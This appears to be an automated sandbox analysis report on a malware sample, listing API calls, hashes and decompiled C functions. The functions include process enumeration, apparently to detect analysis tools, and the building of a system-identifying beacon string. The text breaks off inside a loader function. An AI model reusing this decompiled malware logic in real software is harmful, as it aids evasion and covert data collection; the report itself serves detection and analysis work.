                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: FreeHeap$lstrlenmemcpymemset
                                                                                                            • String ID: Uxt
                                                                                                            • API String ID: 3442150357-1536154274
                                                                                                            • Opcode ID: 9131a6f8e2f701eef9399ed5c66e0ce2d06d9580d8301257b32263d056906b99
                                                                                                            • Instruction ID: b7354929ca658a7b6173a53b81df9eb55fd141441519fe8df60f730220d5bf58
                                                                                                            • Opcode Fuzzy Hash: 9131a6f8e2f701eef9399ed5c66e0ce2d06d9580d8301257b32263d056906b99
                                                                                                            • Instruction Fuzzy Hash: 5881A674A07244EFC790FBB6CDC4DAFB7EEEB9A6007294D65A001DF108EA35D9448B20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F09E84C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,jo,00000002,00000000,?,?,?,6F09EB6A,?,00000000), ref: 6F09E8E5
                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,jo,00000002,00000000,?,?,?,6F09EB6A,?,00000000), ref: 6F09E90E
                                                                                                            • GetACP.KERNEL32(?,?,6F09EB6A,?,00000000), ref: 6F09E923
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID: ACP$OCP$jo
                                                                                                            • API String ID: 2299586839-1723675111
                                                                                                            • Opcode ID: 51c8729580726fbee3e22a5440746d16e0bdc1fc14cb016e65875fa6e3f5022c
                                                                                                            • Instruction ID: b9038b26e503fdf3372fd5dba6b1beb4a290d0c80aad08930d05b0c569eee49d
                                                                                                            • Opcode Fuzzy Hash: 51c8729580726fbee3e22a5440746d16e0bdc1fc14cb016e65875fa6e3f5022c
                                                                                                            • Instruction Fuzzy Hash: FC21B322A04205A6E7248BA8C901B8B77F7FF45B64B569525EA1DDB241F732ED40E3B0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F09E0A2, Relevance: 7.8, APIs: 5, Instructions: 251COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 6F08F299: GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                              • Part of subcall function 6F08F299: SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                            • GetACP.KERNEL32(?,?,?,?,?,?,6F0925B5,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6F09E163
                                                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6F0925B5,?,?,?,00000055,?,-00000050,?,?), ref: 6F09E18E
                                                                                                            • _wcschr.LIBVCRUNTIME ref: 6F09E222
                                                                                                            • _wcschr.LIBVCRUNTIME ref: 6F09E230
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6F09E2F1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                            • String ID:
                                                                                                            • API String ID: 4147378913-0
                                                                                                            • Opcode ID: f5c60cc61911608f52f9e14ce493f9329e64f682b7e2d6fe73ffed1cfda6bb5a
                                                                                                            • Instruction ID: 7d94eda82526b67a6a9a647f4f0cb3aedd7e4f5a96d6fa77c282a6fd0cf40f51
                                                                                                            • Opcode Fuzzy Hash: f5c60cc61911608f52f9e14ce493f9329e64f682b7e2d6fe73ffed1cfda6bb5a
                                                                                                            • Instruction Fuzzy Hash: DC71FF71A04706AAEB15AB74CC45FAA73E8FF45714F00642AEA19DB1C0FB74ED40A7B0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F09EA21, Relevance: 7.7, APIs: 5, Instructions: 183COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 6F08F299: GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                              • Part of subcall function 6F08F299: SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                              • Part of subcall function 6F08F299: _free.LIBCMT ref: 6F08F2FB
                                                                                                              • Part of subcall function 6F08F299: _free.LIBCMT ref: 6F08F331
                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6F09EB2D
                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 6F09EB76
                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 6F09EB85
                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6F09EBCD
                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6F09EBEC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 949163717-0
                                                                                                            • Opcode ID: 057f518d5d8160680a9422fd9c388a3f9a5342eeb9dbfc4036b79decfd537a7a
                                                                                                            • Instruction ID: f7c5c2cede04a5099c9d5b96f66da20424d4ed8fbe69b65b7d2ef50b0a75e124
                                                                                                            • Opcode Fuzzy Hash: 057f518d5d8160680a9422fd9c388a3f9a5342eeb9dbfc4036b79decfd537a7a
                                                                                                            • Instruction Fuzzy Hash: 5F515A71A0060AEAEF00DFA5CC44BAFB7B8BF09305F04556AE925E7191F770A940AB71
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03034A03, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 68%
                                                                                                            			E03034A03() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x303d2e0; // 0x22da5a8
						_t2 = _t9 + 0x303ee3c; // 0x73617661
						_push( &_v264);
						if( *0x303d110() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                                                                                            0x03034a0e
                                                                                                            0x03034a18
                                                                                                            0x03034a1c
                                                                                                            0x03034a26
                                                                                                            0x03034a57
                                                                                                            0x03034a2d
                                                                                                            0x03034a32
                                                                                                            0x03034a3f
                                                                                                            0x03034a48
                                                                                                            0x03034a5f
                                                                                                            0x03034a4a
                                                                                                            0x03034a52
                                                                                                            0x00000000
                                                                                                            0x03034a52
                                                                                                            0x03034a60
                                                                                                            0x03034a61
                                                                                                            0x00000000
                                                                                                            0x03034a61
                                                                                                            0x00000000
                                                                                                            0x03034a5b
                                                                                                            0x03034a67
                                                                                                            0x03034a6c

                                                                                                            APIs
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03034A13
                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 03034A26
                                                                                                            • Process32Next.KERNEL32(00000000,?), ref: 03034A52
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 03034A61
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                            • String ID:
                                                                                                            • API String ID: 420147892-0
                                                                                                            • Opcode ID: 22908542aab9c5cd8d56f44817a1bfe905b159750c951cf3fd5831b482759219
                                                                                                            • Instruction ID: 603632de1550618bb8923e09195a376aa1dbba93f68d3558a8f7bdf11fd7a0bd
                                                                                                            • Opcode Fuzzy Hash: 22908542aab9c5cd8d56f44817a1bfe905b159750c951cf3fd5831b482759219
                                                                                                            • Instruction Fuzzy Hash: E1F02B3610362467D720F627DC0AEDB33ACDFC7310F0405A2E515D7000EA38CA55C7A5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03036109, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 244memorystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 74%
                                                                                                            			E03036109(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x303d018; // 0x3dd6b064
				asm("bswap eax");
				_t61 =  *0x303d014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x303d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x303d00c; // 0x13d015ef
				asm("bswap eax");
				_t64 =  *0x303d2e0; // 0x22da5a8
				_t3 = _t64 + 0x303e633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3f874, _t63, _t62, _t61, _t60,  *0x303d02c,  *0x303d004, _t59);
				_t67 = E03035B60();
				_t68 =  *0x303d2e0; // 0x22da5a8
				_t4 = _t68 + 0x303e673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71;
				_t72 = E03031BBF(_t134);
				_t133 = __imp__; // 0x74785520
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x303d2e0; // 0x22da5a8
					_t7 = _t126 + 0x303e8cc; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x303d270, 0, _v8);
				}
				_t73 = E0303137A();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x303d2e0; // 0x22da5a8
					_t11 = _t121 + 0x303e8d4; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x303d270, 0, _v8);
				}
				_t146 =  *0x303d364; // 0x53195b0
				_t75 = E03033857(0x303d00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0x303d270, _t152, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x303d270, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x303d270, _t152, _v20);
						goto L26;
					}
					E0303A811(GetTickCount());
					_t82 =  *0x303d364; // 0x53195b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x303d364; // 0x53195b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x303d364; // 0x53195b0
					_t148 = E03031974(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0x303d270, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0x303c2ac);
					_push(_t148);
					_t94 = E030338CA();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x303d270, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E03031922( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E030347D5();
						L22:
						HeapFree( *0x303d270, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E0303365D(_t133, 0xffffffffffffffff, _t148,  &_v24);
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_v12 = E03033273(_t157, _a4, _a8, _a12);
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E03034AAB(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E03038FB2(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E03034AAB(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}





















































                                                                                                            0x03036109
                                                                                                            0x03036109
                                                                                                            0x03036109
                                                                                                            0x03036112
                                                                                                            0x0303611b
                                                                                                            0x0303611d
                                                                                                            0x0303611d
                                                                                                            0x0303612a
                                                                                                            0x03036135
                                                                                                            0x03036138
                                                                                                            0x0303613d
                                                                                                            0x03036146
                                                                                                            0x03036149
                                                                                                            0x0303614e
                                                                                                            0x03036151
                                                                                                            0x03036156
                                                                                                            0x03036159
                                                                                                            0x03036165
                                                                                                            0x03036172
                                                                                                            0x03036174
                                                                                                            0x0303617a
                                                                                                            0x0303617f
                                                                                                            0x0303618a
                                                                                                            0x0303618c
                                                                                                            0x0303618f
                                                                                                            0x03036191
                                                                                                            0x03036196
                                                                                                            0x0303619c
                                                                                                            0x030361a1
                                                                                                            0x030361a4
                                                                                                            0x030361a9
                                                                                                            0x030361b6
                                                                                                            0x030361b8
                                                                                                            0x030361be
                                                                                                            0x030361c8
                                                                                                            0x030361c8
                                                                                                            0x030361ca
                                                                                                            0x030361cf
                                                                                                            0x030361d4
                                                                                                            0x030361d7
                                                                                                            0x030361dc
                                                                                                            0x030361e9
                                                                                                            0x030361eb
                                                                                                            0x030361f9
                                                                                                            0x030361f9
                                                                                                            0x030361fb
                                                                                                            0x03036209
                                                                                                            0x0303620e
                                                                                                            0x03036210
                                                                                                            0x03036215
                                                                                                            0x030363d6
                                                                                                            0x030363e0
                                                                                                            0x030363e9
                                                                                                            0x0303621b
                                                                                                            0x03036227
                                                                                                            0x0303622d
                                                                                                            0x03036232
                                                                                                            0x030363ca
                                                                                                            0x030363d4
                                                                                                            0x00000000
                                                                                                            0x030363d4
                                                                                                            0x0303623e
                                                                                                            0x03036243
                                                                                                            0x0303624c
                                                                                                            0x0303625d
                                                                                                            0x03036261
                                                                                                            0x0303626a
                                                                                                            0x03036270
                                                                                                            0x0303627f
                                                                                                            0x03036286
                                                                                                            0x0303628f
                                                                                                            0x03036295
                                                                                                            0x030363be
                                                                                                            0x030363c8
                                                                                                            0x00000000
                                                                                                            0x030363c8
                                                                                                            0x030362a1
                                                                                                            0x030362a7
                                                                                                            0x030362a8
                                                                                                            0x030362ad
                                                                                                            0x030362b2
                                                                                                            0x030363b4
                                                                                                            0x030363bc
                                                                                                            0x00000000
                                                                                                            0x030363bc
                                                                                                            0x030362bb
                                                                                                            0x030362c2
                                                                                                            0x030362ca
                                                                                                            0x030362cf
                                                                                                            0x030362d8
                                                                                                            0x030362e3
                                                                                                            0x030362e8
                                                                                                            0x030362ed
                                                                                                            0x030363ec
                                                                                                            0x030363a0
                                                                                                            0x030363a0
                                                                                                            0x030363a5
                                                                                                            0x030363b0
                                                                                                            0x030363b2
                                                                                                            0x00000000
                                                                                                            0x030363b2
                                                                                                            0x030362f7
                                                                                                            0x030362fc
                                                                                                            0x03036301
                                                                                                            0x03036306
                                                                                                            0x03036316
                                                                                                            0x03036319
                                                                                                            0x0303631f
                                                                                                            0x03036325
                                                                                                            0x0303632b
                                                                                                            0x0303632e
                                                                                                            0x03036334
                                                                                                            0x03036337
                                                                                                            0x0303633c
                                                                                                            0x03036340
                                                                                                            0x03036340
                                                                                                            0x0303634c
                                                                                                            0x03036358
                                                                                                            0x0303635c
                                                                                                            0x0303635e
                                                                                                            0x03036363
                                                                                                            0x03036365
                                                                                                            0x0303636a
                                                                                                            0x0303636f
                                                                                                            0x0303637c
                                                                                                            0x03036384
                                                                                                            0x03036387
                                                                                                            0x03036387
                                                                                                            0x03036363
                                                                                                            0x00000000
                                                                                                            0x0303634e
                                                                                                            0x03036352
                                                                                                            0x03036389
                                                                                                            0x0303638c
                                                                                                            0x03036395
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x03036395
                                                                                                            0x03036354
                                                                                                            0x00000000
                                                                                                            0x03036354
                                                                                                            0x0303634c

                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 0303611D
                                                                                                            • wsprintfA.USER32 ref: 0303616D
                                                                                                            • wsprintfA.USER32 ref: 0303618A
                                                                                                            • wsprintfA.USER32 ref: 030361B6
                                                                                                            • HeapFree.KERNEL32(00000000,?), ref: 030361C8
                                                                                                            • wsprintfA.USER32 ref: 030361E9
                                                                                                            • HeapFree.KERNEL32(00000000,?), ref: 030361F9
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 03036227
                                                                                                            • GetTickCount.KERNEL32 ref: 03036238
                                                                                                            • RtlEnterCriticalSection.NTDLL(05319570), ref: 0303624C
                                                                                                            • RtlLeaveCriticalSection.NTDLL(05319570), ref: 0303626A
                                                                                                              • Part of subcall function 03031974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,03034653,?,053195B0), ref: 0303199F
                                                                                                              • Part of subcall function 03031974: lstrlen.KERNEL32(?,?,?,03034653,?,053195B0), ref: 030319A7
                                                                                                              • Part of subcall function 03031974: strcpy.NTDLL ref: 030319BE
                                                                                                              • Part of subcall function 03031974: lstrcat.KERNEL32(00000000,?), ref: 030319C9
                                                                                                              • Part of subcall function 03031974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,03034653,?,053195B0), ref: 030319E6
                                                                                                            • StrTrimA.SHLWAPI(00000000,0303C2AC,?,053195B0), ref: 030362A1
                                                                                                              • Part of subcall function 030338CA: lstrlen.KERNEL32(05319B10,00000000,00000000,770CC740,0303467E,00000000), ref: 030338DA
                                                                                                              • Part of subcall function 030338CA: lstrlen.KERNEL32(?), ref: 030338E2
                                                                                                              • Part of subcall function 030338CA: lstrcpy.KERNEL32(00000000,05319B10), ref: 030338F6
                                                                                                              • Part of subcall function 030338CA: lstrcat.KERNEL32(00000000,?), ref: 03033901
                                                                                                            • lstrcpy.KERNEL32(00000000,?), ref: 030362C2
                                                                                                            • lstrcpy.KERNEL32(?,?), ref: 030362CA
                                                                                                            • lstrcat.KERNEL32(?,?), ref: 030362D8
                                                                                                            • lstrcat.KERNEL32(?,00000000), ref: 030362DE
                                                                                                              • Part of subcall function 03031922: lstrlen.KERNEL32(?,00000000,05319B38,00000000,030374FF,05319D16,?,?,?,?,?,69B25F44,00000005,0303D00C), ref: 03031929
                                                                                                              • Part of subcall function 03031922: mbstowcs.NTDLL ref: 03031952
                                                                                                              • Part of subcall function 03031922: memset.NTDLL ref: 03031964
                                                                                                            • wcstombs.NTDLL ref: 0303636F
                                                                                                              • Part of subcall function 03033273: SysAllocString.OLEAUT32(?), ref: 030332AE
                                                                                                              • Part of subcall function 03034AAB: RtlFreeHeap.NTDLL(00000000,00000000,03035012,00000000,?,?,00000000), ref: 03034AB7
                                                                                                            • HeapFree.KERNEL32(00000000,?,?), ref: 030363B0
                                                                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 030363BC
                                                                                                            • HeapFree.KERNEL32(00000000,?,?,053195B0), ref: 030363C8
                                                                                                            • HeapFree.KERNEL32(00000000,?), ref: 030363D4
                                                                                                            • HeapFree.KERNEL32(00000000,?), ref: 030363E0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                                                                            • String ID: Uxt
                                                                                                            • API String ID: 3748877296-1536154274
                                                                                                            • Opcode ID: 39934ed942171c7913de6ffc4a4461317df936df59441dfdbf76bac9e044c574
                                                                                                            • Instruction ID: 25f7963e2d8f74c7059e7d09d590f40b964accd4e910700e050f210a20ca1b18
                                                                                                            • Opcode Fuzzy Hash: 39934ed942171c7913de6ffc4a4461317df936df59441dfdbf76bac9e044c574
                                                                                                            • Instruction Fuzzy Hash: 9C914775902208BFDB11EFA8DC88AAEBBBDFF4A350B144065F404E7250DB35D911DBA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F066CAF, Relevance: 24.3, APIs: 16, Instructions: 287COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$GetcollLockit$H_prolog3H_prolog3_LocinfoLocinfo::~_Lockit::_Lockit::~_collatenumpunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 1918051841-0
                                                                                                            • Opcode ID: 4994eb03090cc7b491e1af23c8dbdf7622292d28f03a77a5e05c979a46f592c3
                                                                                                            • Instruction ID: b88f8a9b62268b91310e837935197862e9c1f3f2e6417438e6ac06688119bf8d
                                                                                                            • Opcode Fuzzy Hash: 4994eb03090cc7b491e1af23c8dbdf7622292d28f03a77a5e05c979a46f592c3
                                                                                                            • Instruction Fuzzy Hash: 3D91F670E05325AAEB246BB58E41B7F7AE9DF47754F10452DF808AF2C1EB748D1087A2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F09B2A4, Relevance: 19.6, APIs: 13, Instructions: 113COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ___free_lconv_mon.LIBCMT ref: 6F09B2E8
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA15
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA27
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA39
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA4B
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA5D
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA6F
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA81
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA93
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CAA5
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CAB7
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CAC9
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CADB
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CAED
                                                                                                            • _free.LIBCMT ref: 6F09B2DD
                                                                                                              • Part of subcall function 6F091434: HeapFree.KERNEL32(00000000,00000000,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?), ref: 6F09144A
                                                                                                              • Part of subcall function 6F091434: GetLastError.KERNEL32(?,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?,?), ref: 6F09145C
                                                                                                            • _free.LIBCMT ref: 6F09B2FF
                                                                                                            • _free.LIBCMT ref: 6F09B314
                                                                                                            • _free.LIBCMT ref: 6F09B31F
                                                                                                            • _free.LIBCMT ref: 6F09B341
                                                                                                            • _free.LIBCMT ref: 6F09B354
                                                                                                            • _free.LIBCMT ref: 6F09B362
                                                                                                            • _free.LIBCMT ref: 6F09B36D
                                                                                                            • _free.LIBCMT ref: 6F09B3A5
                                                                                                            • _free.LIBCMT ref: 6F09B3AC
                                                                                                            • _free.LIBCMT ref: 6F09B3C9
                                                                                                            • _free.LIBCMT ref: 6F09B3E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                            • String ID:
                                                                                                            • API String ID: 161543041-0
                                                                                                            • Opcode ID: 470744bdfdf01437a282fe4940c7cf31b79590a7af01519aebf5157f1fb0f870
                                                                                                            • Instruction ID: 3f9fa70ca20f02cb9c3e7a39182d44f9e0c1c8e6995c2c591b584dee4214acfc
                                                                                                            • Opcode Fuzzy Hash: 470744bdfdf01437a282fe4940c7cf31b79590a7af01519aebf5157f1fb0f870
                                                                                                            • Instruction Fuzzy Hash: 693139B16047019FEB118B39DA40BDA73E9AF04324F54A42AE465DB191EF30FA81EB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03031000, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109librarymemoryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 73%
                                                                                                            			E03031000(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E03034837(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E0303A938( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x303d298 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x303d2e0; // 0x22da5a8
					_t18 = _t47 + 0x303e3b3; // 0x73797325
					_t68 = E03032291(_t18);
